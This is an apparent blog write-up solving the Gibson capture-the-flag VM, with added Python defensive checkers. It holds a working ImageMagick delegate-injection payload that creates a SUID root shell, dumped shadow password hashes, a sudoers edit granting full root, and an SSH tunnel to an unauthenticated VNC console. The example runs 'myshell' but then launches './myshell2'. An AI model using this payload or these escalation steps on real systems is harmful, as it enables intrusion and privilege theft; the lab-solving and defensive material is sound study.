Mr_H4sh

Infosec, CTF and more

Gibson Solution

In this post I’m going to show you how to solve the Gibson VM provided by Knightmare.

You can find the VM on this link

192.168.56.102 <== attacker
192.168.56.101 <== victim

I run nmap to check which services are running on the machine:

nmap -sV -p- -Pn -n -v 192.168.56.101 -oA 192.168.56.101_full_version_scan

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7
MAC Address: 08:00:27:5B:0C:58 (Oracle VirtualBox virtual NIC)
Service Info: Host: gibson.example.co.uk; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Ok, just two TCP ports open.

I have a look at the website at http://192.168.56.101:80 and all I find is a link to http://192.168.56.101:80/davinci.html

So, I click the link and I find a page that says: “The answer you seek will be found by brute force”.

So, if I understand correctly, he wants me to fuzz URLs… don’t fall into the trap! Instead, I check the source code of the page, and this is what I find:

<html>
<title>Gibson Mining Corporation</title>
<body>
<!-- Damn it Margo! Stop setting your password to "god" -->
<!-- at least try and use a different one of the 4 most -->
<!-- common ones! (eugene) -->
<h1> The answer you seek will be found by brute force</h1>
</body>

Now, since I want to trust my friend “eugene”, I try to ssh in as the user margo with the password god:

# ssh margo@192.168.56.101
Ubuntu 14.04.3 LTS
margo@192.168.56.101's password: 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic x86_64)

  System information as of Tue May 17 13:23:07 BST 2016

  System load: 0.0               Memory usage: 6%   Processes:       81
  Usage of /:  82.2% of 1.85GB   Swap usage:   0%   Users logged in: 0

  Graph this data and manage this system at:
    https://landscape.canonical.com/

margo@gibson:~$ whoami
margo
margo@gibson:~$ id
uid=1002(margo) gid=1002(margo) groups=1002(margo),27(sudo)

It would be wonderful if margo could run anything as root, but no: despite being in the sudo group, she (or he) can run just one command through sudo:

margo@gibson:~$ sudo -l
Matching Defaults entries for margo on gibson:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User margo may run the following commands on gibson:
    (ALL) NOPASSWD: /usr/bin/convert
margo@gibson:~$ which convert
/usr/bin/convert

Uhm… I have a look at the passwd file:

margo@gibson:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:107::/var/run/dbus:/bin/false
dnsmasq:x:103:65534:dnsmasq,,,:/var/lib/misc:/bin/false
landscape:x:104:110::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
libvirt-qemu:x:106:106:Libvirt Qemu,,,:/var/lib/libvirt:/bin/false
libvirt-dnsmasq:x:107:111:Libvirt Dnsmasq,,,:/var/lib/libvirt/dnsmasq:/bin/false
duke:x:1000:1000:Duke Ellingson,,,:/home/duke:/bin/bash
colord:x:108:115:colord colour management daemon,,,:/var/lib/colord:/bin/false
eugene:x:1001:1001:Eugene Belford:/home/eugene:
margo:x:1002:1002:Margo Wallace:/home/margo:/bin/bash

I check whether there is any known exploit for the convert command, and I find out about an ImageMagick exploit at this link. At this point I write the following file, which makes convert copy /bin/sh and set the SUID bit on the copy, giving me a root shell:

margo@gibson:~$ cat exploit.jpg 
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|cp /bin/sh myshell; chmod 4777 myshell")'
pop graphic-context

margo@gibson:~$ sudo /usr/bin/convert exploit.jpg exploit.png
chmod: cannot access myshell: No such file or directory
convert: unrecognized color `https://example.com/image.jpg"|cp /bin/sh myshell; chmod 4777 myshell"' @ warning/color.c/GetColorCompliance/947.
convert: unable to open image `/tmp/magick-KzaGfMI2': No such file or directory @ error/blob.c/OpenBlob/2638.
convert: unable to open file `/tmp/magick-KzaGfMI2': No such file or directory @ error/constitute.c/ReadImage/583.
convert: non-conforming drawing primitive definition `fill' @ error/draw.c/DrawImage/3158.

margo@gibson:~$ ls -l
-rw-rw-r-- 1 margo margo     146 May 17 18:46 exploit.jpg
-rw-r--r-- 1 root  root      421 May 17 18:46 exploit.png
-rwsrwxrwx 1 root  root   121272 May 17 18:46 myshell

margo@gibson:~$ ./myshell2 
# id
uid=1002(margo) gid=1002(margo) euid=0(root) groups=0(root),27(sudo),1002(margo)
# cat /etc/shadow
root:!:16921:0:99999:7:::
daemon:*:16652:0:99999:7:::
bin:*:16652:0:99999:7:::
sys:*:16652:0:99999:7:::
sync:*:16652:0:99999:7:::
games:*:16652:0:99999:7:::
man:*:16652:0:99999:7:::
lp:*:16652:0:99999:7:::
mail:*:16652:0:99999:7:::
news:*:16652:0:99999:7:::
uucp:*:16652:0:99999:7:::
proxy:*:16652:0:99999:7:::
www-data:*:16652:0:99999:7:::
backup:*:16652:0:99999:7:::
list:*:16652:0:99999:7:::
irc:*:16652:0:99999:7:::
gnats:*:16652:0:99999:7:::
nobody:*:16652:0:99999:7:::
libuuid:!:16652:0:99999:7:::
syslog:*:16652:0:99999:7:::
messagebus:*:16921:0:99999:7:::
dnsmasq:*:16921:0:99999:7:::
landscape:*:16921:0:99999:7:::
sshd:*:16921:0:99999:7:::
libvirt-qemu:!:16921:0:99999:7:::
libvirt-dnsmasq:!:16921:0:99999:7:::
duke:$6$xRLSRx7x$O.REaRUKj6zM.ZAYFBfZEfq.iyoiHKlpNCFlh9D8gQBfRdldL05vAxHmjuTgriKCetSADyWyLKvklZhcQp7mu1:16928:0:99999:7:::
colord:*:16922:0:99999:7:::
eugene:$6$UU15rhob$qZ5B2VjeCk9QIlxXS6QDf9MuxFpNkfAQTc3V3ny.57kLHLj1aOdLnmprfL53niAfztzGMLJqSZaS79sYY1X1a/:16928:0:99999:7:::
margo:$6$Nx0eYFUO$f99BzOSc/hBLbflCsV5912gdcNNUKRi/xGTz7xldbr402BQ367eN.GsCScejNNotaJg9oQPhqdzqq/DcHCKYD/:16928:0:99999:7:::
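Two defender-side checks that follow from what just happened, added here as an example (this is not code from the write-up or from ImageMagick): the first scans a drawing file for a url() reference that smuggles shell metacharacters into the filename ImageMagick hands to a delegate, using the exploit.jpg above as its sample; the second reads an ImageMagick policy.xml and reports which of the coders that the published mitigation for this 2016 delegate bug tells you to deny are still permitted. The benign MVG sample and the two policy fragments are constructed for the example.

```python
import re
import xml.etree.ElementTree as ET

# Sample inputs. EXPLOIT_MVG is the exploit.jpg from the write-up (MVG text
# despite the .jpg name: ImageMagick sniffs the content, not the extension).
# BENIGN_MVG and the two policy fragments are constructed for this example.
EXPLOIT_MVG = """push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|cp /bin/sh myshell; chmod 4777 myshell")'
pop graphic-context
"""

BENIGN_MVG = """push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg)'
pop graphic-context
"""

WEAK_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
</policymap>
"""

HARDENED_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="none" pattern="EPHEMERAL"/>
  <policy domain="coder" rights="none" pattern="URL"/>
  <policy domain="coder" rights="none" pattern="HTTPS"/>
  <policy domain="coder" rights="none" pattern="MVG"/>
  <policy domain="coder" rights="none" pattern="MSL"/>
</policymap>
"""

# Coders the published mitigation for the delegate bug says to deny in policy.xml.
RISKY_CODERS = ("EPHEMERAL", "URL", "HTTPS", "MVG", "MSL")

# Characters that let a "filename" break out of the delegate's shell command.
SHELL_META = re.compile(r"""["'`|;&$<>]""")
URL_REF = re.compile(r"url\((.*)\)")


def scan_mvg_for_delegate_injection(text):
    """Return [(line_number, url_target)] for every url() whose target
    contains shell metacharacters. A clean URL yields no finding."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = URL_REF.search(line)
        if m and SHELL_META.search(m.group(1)):
            findings.append((lineno, m.group(1)))
    return findings


def missing_coder_restrictions(policy_xml):
    """Return the risky coders that policy.xml does not deny outright."""
    denied = set()
    for pol in ET.fromstring(policy_xml).iter("policy"):
        if pol.get("domain") == "coder" and pol.get("rights") == "none":
            denied.add((pol.get("pattern") or "").upper())
    return [c for c in RISKY_CODERS if c not in denied]


if __name__ == "__main__":
    for lineno, target in scan_mvg_for_delegate_injection(EXPLOIT_MVG):
        print("line %d: suspicious url() target %r" % (lineno, target))
    print("still allowed by weak policy:", missing_coder_restrictions(WEAK_POLICY))
    print("still allowed by hardened policy:", missing_coder_restrictions(HARDENED_POLICY))
```

The scanner is a triage aid for uploaded images, not a substitute for the policy: the fill line above is rejected by convert as a colour, yet the delegate command had already run, which is why denying the coders in policy.xml (or upgrading) is the fix that matters.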

Sweet, I have a root shell and all the password hashes of the users on this machine. I download the passwd and shadow files to my local machine, unshadow them and use John the Ripper to crack them:

root@kali:/media/sf_shared_folders/linux/pentest/gibson# unshadow passwd shadow > users_hashes
root@kali:/media/sf_shared_folders/linux/pentest/gibson# ls -l
total 24
-rwxrwx--- 1 root vboxsf  507 May 17 13:33 192.168.56.101_full_version_scan.gnmap
-rwxrwx--- 1 root vboxsf  761 May 17 13:33 192.168.56.101_full_version_scan.nmap
-rwxrwx--- 1 root vboxsf 2567 May 17 13:33 192.168.56.101_full_version_scan.xml
-rwxrwx--- 1 root vboxsf 1545 May 18 20:02 passwd
-rwxrwx--- 1 root vboxsf 1122 May 18 20:01 shadow
-rwxrwx--- 1 root vboxsf 1836 May 18 20:06 users_hashes

root@kali:/media/sf_shared_folders/linux/pentest/gibson# john -stdin users_hashes 
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press Ctrl-C to abort, or send SIGUSR1 to john process for status
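The unshadow step joins the two files by user name; doing the same join in a few lines of Python lets you audit what a shadow copy actually exposes. This is an added example, not the write-up's own code: for each account it reports the login shell really in effect (an empty seventh passwd field means login falls back to /bin/sh, which is eugene's case), whether the password is locked, and which crypt(3) algorithm a real hash uses. The sample lines are a subset of the passwd and shadow dumps above; the names `audit_accounts` and `crackable` are this example's.

```python
from collections import namedtuple

# Sample input: a subset of the passwd and shadow lines dumped in the write-up.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
duke:x:1000:1000:Duke Ellingson,,,:/home/duke:/bin/bash
eugene:x:1001:1001:Eugene Belford:/home/eugene:
margo:x:1002:1002:Margo Wallace:/home/margo:/bin/bash
"""

SAMPLE_SHADOW = """root:!:16921:0:99999:7:::
sshd:*:16921:0:99999:7:::
duke:$6$xRLSRx7x$O.REaRUKj6zM.ZAYFBfZEfq.iyoiHKlpNCFlh9D8gQBfRdldL05vAxHmjuTgriKCetSADyWyLKvklZhcQp7mu1:16928:0:99999:7:::
eugene:$6$UU15rhob$qZ5B2VjeCk9QIlxXS6QDf9MuxFpNkfAQTc3V3ny.57kLHLj1aOdLnmprfL53niAfztzGMLJqSZaS79sYY1X1a/:16928:0:99999:7:::
margo:$6$Nx0eYFUO$f99BzOSc/hBLbflCsV5912gdcNNUKRi/xGTz7xldbr402BQ367eN.GsCScejNNotaJg9oQPhqdzqq/DcHCKYD/:16928:0:99999:7:::
"""

Account = namedtuple("Account", "name uid gid shell state algorithm")

# crypt(3) "$id$" prefixes and the algorithm each one denotes
CRYPT_IDS = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
             "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}


def classify_hash(field):
    """Map a shadow password field to (state, algorithm)."""
    if field == "":
        return "empty", None                 # logs in with no password at all
    if field[0] in "!*":
        return "locked", None                # '!' locked by admin, '*' never set
    if field.startswith("$"):
        crypt_id = field.split("$")[1]
        return "hashed", CRYPT_IDS.get(crypt_id, "unknown")
    return "hashed", "descrypt"              # legacy 13-character DES hash


def parse_passwd(text):
    users = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, uid, gid, _gecos, _home, shell = line.split(":", 6)
        # An empty shell field is legal and means login(1) falls back to /bin/sh;
        # flag it explicitly so it is not mistaken for a nologin account.
        users[name] = (int(uid), int(gid), shell or "/bin/sh (default, field empty)")
    return users


def parse_shadow(text):
    return {line.split(":", 1)[0]: line.split(":", 2)[1]
            for line in text.splitlines() if line}


def audit_accounts(passwd_text, shadow_text):
    """Join passwd and shadow by user name, as unshadow does, and classify."""
    hashes = parse_shadow(shadow_text)
    accounts = []
    for name, (uid, gid, shell) in parse_passwd(passwd_text).items():
        state, algo = classify_hash(hashes.get(name, "*"))
        accounts.append(Account(name, uid, gid, shell, state, algo))
    return accounts


def crackable(accounts):
    """Names whose hashes someone holding a shadow copy can attack offline."""
    return [a.name for a in accounts if a.state == "hashed"]


if __name__ == "__main__":
    for acct in audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(acct)
    print("offline-crackable:", crackable(audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW)))
```

On the dumps above this yields exactly the three sha512crypt hashes John reports loading, and it shows root's field is `!`: the root password is locked, so a password login or plain `su` to root cannot succeed, which is consistent with the write-up going through margo's sudo instead.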

It might take time, and it’s not even certain that I’ll crack them, so in the meantime I go and check if there’s anything else interesting on the server. After all, I’m root now ;) First thing, I prefer a bash shell to an sh shell, so I add the user margo to the sudoers file:

# vim /etc/sudoers

[...] 
# User privilege specification
root    ALL=(ALL:ALL) ALL
margo   ALL=(ALL:ALL) ALL
[...]

# su - margo
Password: 
margo@gibson:~$ sudo su
[sudo] password for margo: god
root@gibson:/home/margo# 
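The whole escalation hinged on one NOPASSWD line, so it is worth being able to pull such lines out of a sudoers file mechanically. This added example (not the write-up's own code) parses the common subset of sudoers(5) user specifications and reports who may run what as root without a password. The sample file is constructed: the two lines added above, the sudoers equivalent of the grant `sudo -l` reported for margo, plus a group rule and a Defaults line to show they are handled; aliases, `#include` directives and line continuations are outside its scope.

```python
import re
from dataclasses import dataclass

# Constructed sample: the two lines the write-up adds, the equivalent of the
# grant 'sudo -l' reported for margo, a group rule and a Defaults line.
SAMPLE_SUDOERS = """Defaults env_reset, mail_badpass
# User privilege specification
root    ALL=(ALL:ALL) ALL
margo   ALL=(ALL:ALL) ALL
margo   ALL=(ALL) NOPASSWD: /usr/bin/convert
%sudo   ALL=(ALL:ALL) ALL
"""

# user  hosts = (runas_user[:runas_group]) [TAG:]... command[, command]...
SPEC_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<hosts>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<rest>.+)$")

TAGS = {"NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV",
        "LOG_INPUT", "NOLOG_INPUT", "LOG_OUTPUT", "NOLOG_OUTPUT",
        "MAIL", "NOMAIL", "FOLLOW", "NOFOLLOW"}

SKIP_PREFIXES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias",
                 "Runas_Alias", "@")


@dataclass
class Rule:
    user: str
    hosts: str
    runas_user: str
    runas_group: str
    tags: set        # collected over the whole rule, which is enough for reporting
    commands: list


def parse_sudoers(text):
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drops comments (and #include lines)
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue
        runas_user, _, runas_group = (m.group("runas") or "root").partition(":")
        tags, commands = set(), []
        for cmd in m.group("rest").split(","):
            cmd = cmd.strip()
            while True:                          # peel off leading TAG: prefixes
                head, sep, tail = cmd.partition(":")
                if sep and head.strip() in TAGS:
                    tags.add(head.strip())
                    cmd = tail.strip()
                else:
                    break
            commands.append(cmd)
        rules.append(Rule(m.group("user"), m.group("hosts"),
                          runas_user.strip() or "root", runas_group.strip(),
                          tags, commands))
    return rules


def passwordless_root_rules(rules):
    """Rules that run something as root (or as anyone) with no password prompt."""
    return [r for r in rules if "NOPASSWD" in r.tags and r.runas_user in ("root", "ALL")]


def full_root_rules(rules):
    """Rules that grant every command as root (or as anyone)."""
    return [r for r in rules if "ALL" in r.commands and r.runas_user in ("root", "ALL")]


if __name__ == "__main__":
    parsed = parse_sudoers(SAMPLE_SUDOERS)
    for r in passwordless_root_rules(parsed):
        print("NOPASSWD as root:", r.user, r.commands)
    for r in full_root_rules(parsed):
        print("unrestricted root:", r.user)
```

The interesting output is the first category: a single binary granted without a password is only as safe as that binary's whole attack surface, and here the binary was an image converter with a known delegate bug.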

Sweet, now margo is a sudoer (a sudoer with god as password…). I discover that the server is connected to another subnet, 192.168.122.x, on which it has the IP 192.168.122.1. I also discover that the server is listening on port 5900:

root@gibson:~# lsof -i
COMMAND    PID            USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
dhclient   529            root    6u  IPv4   9748      0t0  UDP *:bootpc 
dhclient   529            root   20u  IPv4   9682      0t0  UDP *:50353 
dhclient   529            root   21u  IPv6   9683      0t0  UDP *:12810 
sshd       946            root    3u  IPv4  10635      0t0  TCP *:ssh (LISTEN)
sshd       946            root    4u  IPv6  10637      0t0  TCP *:ssh (LISTEN)
apache2   1107            root    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
apache2   1124        www-data    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
apache2   1125        www-data    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
apache2   1126        www-data    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
apache2   1127        www-data    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
apache2   1128        www-data    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
dnsmasq   1237 libvirt-dnsmasq    4u  IPv4  11066      0t0  UDP *:bootps 
dnsmasq   1237 libvirt-dnsmasq    6u  IPv4  11069      0t0  UDP 192.168.122.1:domain 
dnsmasq   1237 libvirt-dnsmasq    7u  IPv4  11070      0t0  TCP 192.168.122.1:domain (LISTEN)
qemu-syst 1247    libvirt-qemu   10u  IPv4  11304      0t0  TCP localhost:5900 (LISTEN)
apache2   1343        www-data    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
sshd      1901            root    3u  IPv4  25545      0t0  TCP 192.168.56.101:ssh->192.168.56.102:48998 (ESTABLISHED)
sshd      1990           margo    3u  IPv4  25545      0t0  TCP 192.168.56.101:ssh->192.168.56.102:48998 (ESTABLISHED)

root@gibson:~# iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
ACCEPT     udp  --  anywhere             anywhere             udp dpt:domain
ACCEPT     tcp  --  anywhere             anywhere             tcp dpt:domain
ACCEPT     udp  --  anywhere             anywhere             udp dpt:bootps
ACCEPT     tcp  --  anywhere             anywhere             tcp dpt:bootps

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         
ACCEPT     all  --  anywhere             192.168.122.0/24     ctstate RELATED,ESTABLISHED
ACCEPT     all  --  192.168.122.0/24     anywhere            
ACCEPT     all  --  anywhere             anywhere            
REJECT     all  --  anywhere             anywhere             reject-with icmp-port-unreachable
REJECT     all  --  anywhere             anywhere             reject-with icmp-port-unreachable

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         
ACCEPT     udp  --  anywhere             anywhere             udp dpt:bootpc

root@gibson:~# ps aux | grep qemu-syst
libvirt+  1247  0.5 14.6 841876 111356 ?       Sl   13:23   2:07 /usr/bin/qemu-system-x86_64 -name ftpserv -S -machine pc-i440fx-trusty,accel=tcg,usb=off -m 256 -realtime mlock=off -smp 1,sockets=1,cores=1,threads=1 -uuid ebcdaa6c-b10a-d758-c13a-0fb296b011f1 -no-user-config -nodefaults -chardev socket,id=charmonitor,path=/var/lib/libvirt/qemu/ftpserv.monitor,server,nowait -mon chardev=charmonitor,id=monitor,mode=control -rtc base=utc -no-shutdown -boot strict=on -device piix3-usb-uhci,id=usb,bus=pci.0,addr=0x1.0x2 -drive file=/var/lib/libvirt/images/ftpserv.img,if=none,id=drive-ide0-0-0,format=raw -device ide-hd,bus=ide.0,unit=0,drive=drive-ide0-0-0,id=ide0-0-0,bootindex=2 -drive if=none,id=drive-ide0-1-0,readonly=on,format=raw -device ide-cd,bus=ide.1,unit=0,drive=drive-ide0-1-0,id=ide0-1-0,bootindex=1 -netdev tap,fd=23,id=hostnet0 -device rtl8139,netdev=hostnet0,id=net0,mac=52:54:00:72:e2:fb,bus=pci.0,addr=0x3 -chardev pty,id=charserial0 -device isa-serial,chardev=charserial0,id=serial0 -vnc 127.0.0.1:0 -device cirrus-vga,id=video0,bus=pci.0,addr=0x2 -device intel-hda,id=sound0,bus=pci.0,addr=0x4 -device hda-duplex,id=sound0-codec0,bus=sound0.0,cad=0 -device virtio-balloon-pci,id=balloon0,bus=pci.0,addr=0x5
root      3166  0.0  0.2  11756  2256 pts/3    S+   20:04   0:00 grep --color=auto qemu-syst
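Reading `lsof -i` and a long qemu command line by eye is error-prone; the following added example (not the write-up's own code) does the two checks that matter here mechanically: it classifies each bound socket by how far it is exposed (wildcard, one interface, loopback only), which is what told the author that port 5900 needed a tunnel, and it inspects a qemu command line's `-vnc` option for the `password`, `password-secret=` or `sasl` suboptions that make the console ask for credentials. The lsof lines are a subset of the output above; the qemu command line is the one above shortened to the relevant flags.

```python
import shlex
from collections import namedtuple

# Sample input: a subset of the lsof -i lines from the write-up.
SAMPLE_LSOF = """COMMAND    PID            USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
dhclient   529            root    6u  IPv4   9748      0t0  UDP *:bootpc
sshd       946            root    3u  IPv4  10635      0t0  TCP *:ssh (LISTEN)
sshd       946            root    4u  IPv6  10637      0t0  TCP *:ssh (LISTEN)
apache2   1107            root    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
dnsmasq   1237 libvirt-dnsmasq    6u  IPv4  11069      0t0  UDP 192.168.122.1:domain
dnsmasq   1237 libvirt-dnsmasq    7u  IPv4  11070      0t0  TCP 192.168.122.1:domain (LISTEN)
qemu-syst 1247    libvirt-qemu   10u  IPv4  11304      0t0  TCP localhost:5900 (LISTEN)
sshd      1901            root    3u  IPv4  25545      0t0  TCP 192.168.56.101:ssh->192.168.56.102:48998 (ESTABLISHED)
"""

# Sample input: the qemu command line from the write-up, shortened to the
# flags relevant here (the real one carries many more -device arguments).
SAMPLE_QEMU_CMDLINE = (
    "/usr/bin/qemu-system-x86_64 -name ftpserv -S "
    "-machine pc-i440fx-trusty,accel=tcg,usb=off -m 256 "
    "-drive file=/var/lib/libvirt/images/ftpserv.img,if=none,id=drive-ide0-0-0,format=raw "
    "-netdev tap,fd=23,id=hostnet0 -vnc 127.0.0.1:0 "
    "-device cirrus-vga,id=video0,bus=pci.0,addr=0x2")

Listener = namedtuple("Listener", "command pid user proto addr port exposure")


def exposure_of(addr):
    """Classify a bind address: wildcard, loopback, or one specific interface."""
    if addr == "*":
        return "all-interfaces"
    if addr in ("localhost", "::1", "[::1]") or addr.startswith("127."):
        return "loopback-only"
    return "one-interface"


def parse_listeners(lsof_text):
    """Return the bound UDP sockets and LISTENing TCP sockets from `lsof -i`."""
    listeners = []
    for line in lsof_text.splitlines():
        parts = line.split()
        if len(parts) < 9 or parts[0] == "COMMAND":
            continue
        cmd, pid, user, _fd, _type, _dev, _size, proto, name = parts[:9]
        state = parts[9].strip("()") if len(parts) > 9 else None
        if proto not in ("TCP", "UDP") or "->" in name:
            continue                          # connected sockets are not listeners
        if proto == "TCP" and state != "LISTEN":
            continue
        addr, _, port = name.rpartition(":")
        listeners.append(Listener(cmd, int(pid), user, proto, addr, port, exposure_of(addr)))
    return listeners


def vnc_console_auth(cmdline):
    """Return (display, authenticated) for the -vnc option of a qemu command
    line, or None when no VNC console is configured. qemu's -vnc takes
    'display[,option,...]'; without 'password', 'password-secret=' or 'sasl'
    any client that reaches the socket is let in, which is the
    "No authentication needed" the vncviewer session below reports."""
    args = shlex.split(cmdline)
    for i, arg in enumerate(args[:-1]):
        if arg == "-vnc":
            display, *opts = args[i + 1].split(",")
            authenticated = any(o in ("password", "sasl") or o.startswith("password-secret=")
                                for o in opts)
            return display, authenticated
    return None


if __name__ == "__main__":
    for lst in parse_listeners(SAMPLE_LSOF):
        print("%-10s %-4s %-22s %s" % (lst.command, lst.proto, lst.addr + ":" + lst.port, lst.exposure))
    print("VNC console:", vnc_console_auth(SAMPLE_QEMU_CMDLINE))
```

A loopback-only bind is a real control, but only against the network: anyone who can run a process on the host, or forward a port through its sshd as shown next, reaches the socket anyway, so an unauthenticated console still needs `password` (set through the monitor) or libvirt's `<graphics passwd=…>` equivalent.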

It looks like a VM is running on the server, with its disk image at /var/lib/libvirt/images/ftpserv.img and its VNC console bound to localhost:5900. So I set up a port forward from the server to my local machine to connect over VNC to the VM inside the server:

# ON THE SERVER
root@gibson:~# ssh root@192.168.56.102 -R 1111:localhost:5900 -N
The authenticity of host '192.168.56.102 (192.168.56.102)' can't be established.
ECDSA key fingerprint is b2:bf:20:bb:1a:e7:2e:bc:e0:26:1d:fb:f1:c8:7e:46.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.102' (ECDSA) to the list of known hosts.
root@192.168.56.102's password: 
Permission denied, please try again.
root@192.168.56.102's password: 

root@gibson:~# ssh root@192.168.56.102 -R 1111:localhost:5900 -N


# ON MY LOCAL MACHINE
root@kali:/media/sf_shared_folders/linux/pentest/gibson# vncviewer localhost:1111
Connected to RFB server, using protocol version 3.8
No authentication needed
Authentication successful
Desktop name "QEMU (ftpserv)"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

Once connected, a terminal appears. I wander around and find a folder called GARBAGE (having watched Hackers, I have a feeling I’m on the right track). I copy the files from that folder to my local machine to inspect them. There are three files:

root@kali:/media/sf_shared_folders/linux/pentest/gibson/GARBAGE# ls -l
total 164
-rwxrwx--- 1 root vboxsf 73185 May 17 21:11 ADMINSPO.JPG
-rwxrwx--- 1 root vboxsf 87902 May 17 21:15 FLAG.IMG
-rwxrwx--- 1 root vboxsf  1577 May 19 13:43 JZ_UG.ANS

All the files I inspect are corrupted, so I download the image of the VM running on the server and mount it on my computer:

root@kali:/media/root/KFYLNN1/GARBAGE# ls -l
total 856
-rw-r--r-- 1 root root 123141 May  4 22:17 adminspo.jpg
-rw-r--r-- 1 root root 737280 May 14 14:19 flag.img
-rw-r--r-- 1 root root   1601 Jun 11  2002 jz_ug.ans

root@kali:/media/root/KFYLNN1/GARBAGE# exif adminspo.jpg 
EXIF tags in 'ADMINSPO.JPG' ('Motorola' byte order):
--------------------+----------------------------------------------------------
Tag                 |Value
--------------------+----------------------------------------------------------
Image Description   |Rabbit.. Flu Shot... TYPE COOKE YOU IDIOT! I'll head them 
Date and Time       |2016:05:04 22:29:32
Artist              |Virtualization is fun.. What's more, esoteric OSes on 192.
X-Resolution        |72
Y-Resolution        |72
Resolution Unit     |Inch
User Comment        |So there's info here.... Images, hmm... Wasn't that a CVE.
Exif Version        |Exif Version 2.1
FlashPixVersion     |FlashPix Version 1.0
Colour Space        |Internal error (unknown value 65535)
--------------------+----------------------------------------------------------

root@kali:/media/root/KFYLNN1/GARBAGE# cat jz_ug.ans

    [ANSI art in CP437 block characters, signed "jz"; not reproducible here]
                    the ugliest of all are under 5 feet tall

root@kali:/media/root/KFYLNN1/GARBAGE# file flag.img
flag.img: Linux rev 1.0 ext2 filesystem data, UUID=d59bdd40-ec37-4d24-a956-80f549846121

I mount the partition flag.img and this is what I find:

root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121# ls -la
total 70
drwxr-xr-x  4 root root  1024 May 14 14:07 .
drwxr-x---+ 5 root root  4096 May 19 14:55 ..
-rwxrwxr-x  1 root root 21358 Nov 16  2011 davinci
-rw-r--r--  1 root root 28030 Nov 16  2011 davinci.c
-rw-r--r--  1 root root   159 May  5 19:56 hint.txt
drwx------  2 root root 12288 May  5 19:39 lost+found
drwxr-xr-x  2 root root  1024 May  5 20:07 .trash

root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121# cd .trash
root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121# ls -la
total 319
drwxr-xr-x 2 root root   1024 May  5 20:07 .
drwxr-xr-x 4 root root   1024 May 14 14:07 ..
---x------ 1 root root    469 May 14 14:18 flag.txt.gpg
